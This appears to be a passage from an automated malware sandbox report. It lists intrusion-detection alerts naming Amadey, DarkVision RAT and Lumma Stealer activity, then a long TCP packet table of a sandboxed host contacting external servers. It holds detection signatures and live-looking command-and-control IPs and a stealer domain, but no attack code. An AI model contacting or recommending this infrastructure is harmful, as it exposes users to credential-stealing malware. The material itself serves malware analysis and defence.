2024-12-09T08:08:50.670222+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49886	185.215.113.16	80	TCP
2024-12-09T08:08:52.208539+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49889	185.215.113.43	80	TCP
2024-12-09T08:08:52.618249+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49878	154.216.20.243	443	TCP
2024-12-09T08:08:53.818125+0100	2045619	ET MALWARE Win32/DarkVision RAT CnC Checkin M3	1	192.168.2.4	49888	185.157.162.216	5200	TCP
2024-12-09T08:08:54.967477+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49880	185.215.113.206	80	TCP
2024-12-09T08:08:55.178124+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49879	154.216.20.243	443	TCP
2024-12-09T08:08:55.501821+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49917	185.157.162.216	5200	TCP
2024-12-09T08:08:55.858928+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.4	49879	154.216.20.243	443	TCP
2024-12-09T08:08:56.147922+0100	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	1	154.216.20.243	443	192.168.2.4	49879	TCP
2024-12-09T08:08:56.995197+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49880	185.215.113.206	80	TCP
2024-12-09T08:08:58.178195+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49925	185.157.162.216	5200	TCP
2024-12-09T08:08:59.288984+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49880	185.215.113.206	80	TCP
2024-12-09T08:09:00.852607+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49934	185.157.162.216	5200	TCP
2024-12-09T08:09:01.123177+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49880	185.215.113.206	80	TCP
2024-12-09T08:09:01.806109+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49933	104.21.16.9	443	TCP
2024-12-09T08:09:01.806109+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49933	104.21.16.9	443	TCP
2024-12-09T08:09:02.525845+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49933	104.21.16.9	443	TCP
2024-12-09T08:09:02.525845+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49933	104.21.16.9	443	TCP
2024-12-09T08:09:02.596451+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49924	154.216.20.243	443	TCP
2024-12-09T08:09:03.533211+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49941	185.157.162.216	5200	TCP
2024-12-09T08:09:03.840908+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49940	104.21.16.9	443	TCP
2024-12-09T08:09:03.840908+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49940	104.21.16.9	443	TCP
2024-12-09T08:09:06.218667+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49952	185.157.162.216	5200	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 08:08:04.009685040 CET	49754	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:04.129231930 CET	80	49754	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:04.129314899 CET	49754	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:04.371292114 CET	49754	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:04.491816998 CET	80	49754	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:05.464078903 CET	80	49754	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:05.464140892 CET	49754	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:06.980952024 CET	49754	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:06.981127977 CET	49764	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:07.100373030 CET	80	49764	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:07.100434065 CET	49764	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:07.100564003 CET	49764	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:07.100675106 CET	80	49754	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:07.100719929 CET	49754	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:07.219927073 CET	80	49764	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:08.466139078 CET	80	49764	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:08.466207981 CET	49764	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:08.470385075 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:08.589653969 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:08.589725971 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:08.590676069 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:08.709914923 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913059950 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913075924 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913089037 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913160086 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:09.913192034 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913204908 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913216114 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913229942 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913242102 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:09.913244009 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913263083 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:09.913289070 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:09.913517952 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913531065 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:09.913567066 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.032584906 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.032608986 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.032674074 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.036895037 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.036948919 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.104871035 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.104928970 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.104957104 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.104981899 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.108850956 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.108922958 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.108989954 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.109036922 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.117233992 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.117283106 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.117352009 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.117396116 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.125526905 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.125579119 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.125591040 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.125632048 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.134042025 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.134093046 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.134123087 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.134164095 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.142417908 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.142508984 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.142605066 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.142654896 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.150616884 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.150665998 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.150697947 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.150738955 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.158946991 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.158998013 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.159048080 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.159087896 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.167347908 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.167378902 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.167401075 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.167412043 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.175647020 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.175715923 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.175761938 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.175806999 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.183964014 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.184021950 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.184057951 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.184103966 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.224323034 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.224402905 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.224488974 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.296510935 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.296561003 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.296724081 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.296767950 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.298875093 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.298914909 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.298998117 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.299036980 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.303746939 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.303786993 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.303805113 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.303836107 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.308617115 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.308672905 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.308748960 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.308790922 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.313543081 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.313600063 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.313672066 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.313733101 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.318239927 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.318288088 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.318310976 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.318516016 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.322860956 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.322917938 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.323004007 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.323049068 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.327523947 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.327579975 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.327676058 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.327719927 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.332268000 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.332312107 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.332365990 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.332411051 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.336960077 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.337007046 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.337172031 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.337215900 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.341588974 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.341639042 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.341706991 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.341767073 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.346366882 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.346411943 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.346450090 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.346491098 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.350986958 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.351046085 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.351176977 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.351222038 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.355777025 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.355824947 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.355905056 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.355943918 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.359432936 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.359566927 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.359597921 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.359642029 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.363028049 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.363081932 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.363162994 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.363212109 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.366662979 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.366710901 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.366770029 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.366812944 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.370311975 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.370358944 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.370435953 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.370479107 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.373892069 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.373936892 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.374011040 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.374048948 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.377558947 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.377599001 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.377733946 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.377777100 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.381195068 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.381238937 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.381302118 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.381359100 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.384850025 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.384895086 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.384980917 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.385020018 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.415855885 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.415935993 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.415937901 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.415977955 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.417706013 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.417771101 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.417848110 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.417902946 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.488157034 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.488219023 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.488289118 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.488334894 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.489779949 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.489825964 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.489943027 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.489983082 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.492568016 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.492611885 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.492692947 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.492737055 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.495354891 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.495399952 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.495476961 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.495521069 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.498325109 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.498370886 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.498400927 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.498444080 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.501190901 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.501240969 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.501292944 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.501332998 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.503982067 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.504041910 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.504061937 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.504105091 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.506633043 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.506678104 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.506763935 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.506800890 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.509321928 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.509366989 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.509475946 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.509530067 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:10.511807919 CET	80	49766	31.41.244.11	192.168.2.4
Dec 9, 2024 08:08:10.511859894 CET	49766	80	192.168.2.4	31.41.244.11
Dec 9, 2024 08:08:12.717474937 CET	49764	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:12.717775106 CET	49777	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:12.837064028 CET	80	49764	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:12.837097883 CET	80	49777	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:12.837132931 CET	49764	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:12.837188005 CET	49777	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:12.837831020 CET	49777	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:12.957036972 CET	80	49777	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:14.178148031 CET	80	49777	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:14.178201914 CET	49777	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:14.224344015 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:14.343714952 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:14.343801975 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:14.343977928 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:14.463248014 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.691448927 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.691518068 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.691581011 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.692414045 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.692457914 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.692460060 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.692468882 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.692504883 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.694588900 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.694610119 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.694621086 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.694634914 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.694653988 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.694745064 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.694771051 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.694786072 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.694802046 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.696285963 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:15.696305990 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:15.696432114 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:15.736166954 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:15.736183882 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:15.810885906 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.810960054 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.811014891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.824954987 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.825028896 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.825079918 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.884731054 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.884785891 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.884908915 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.887068033 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.887196064 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.887265921 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.895406961 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.895519972 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.895581007 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.903865099 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.903971910 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.904045105 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.912203074 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.912561893 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.912630081 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.920593023 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.920723915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.920789003 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.928926945 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.929302931 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.929362059 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.937231064 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.937268019 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.937325954 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.945657969 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.945796967 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.945852995 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.953911066 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.954051971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.954107046 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:15.962296963 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:15.964065075 CET	49783	80	192.168.2.4	185.215.113.16
